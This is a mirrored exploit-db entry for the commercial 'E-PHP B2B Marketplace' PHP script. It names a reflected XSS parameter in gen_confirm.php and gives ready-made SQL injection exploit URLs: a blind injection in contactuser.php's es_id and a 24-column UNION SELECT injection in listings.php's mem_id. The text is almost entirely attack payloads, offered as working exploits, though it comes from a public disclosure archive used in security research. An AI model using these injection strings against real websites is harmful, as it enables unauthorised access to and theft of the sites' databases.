bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/13819.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

32 lines
No EOL
696 B
Text
Raw Blame History

/*
Name : E-PHP B2B Marketplace Multiple Vulns
WebSite : http://www.ephpscripts.com/b2b-trading-portal.php
Price : 150 USD
Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com
*/
# XSS
- gen_confirm.php shows the error message of $_GET['errmsg'] , but it's not
protected against XSS
- Exploit : [HOST]/[PATH]/gen_confirm.php?errmsg=
# Blind SQLi
- contactuser.php suffers from a blind sqli in the get "es_id"
- Exploit : [HOST]/[PATH]/contactuser.php?es_type=3&es_id=62+and+1=(select
1)--
# SQLi
- listings.php suffers from a blind sqli in the get "mem_id"
- Exploit :
[HOST]/[PATH]/listings.php?mem_id=-207+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
Reference in a new issue View git blame Copy permalink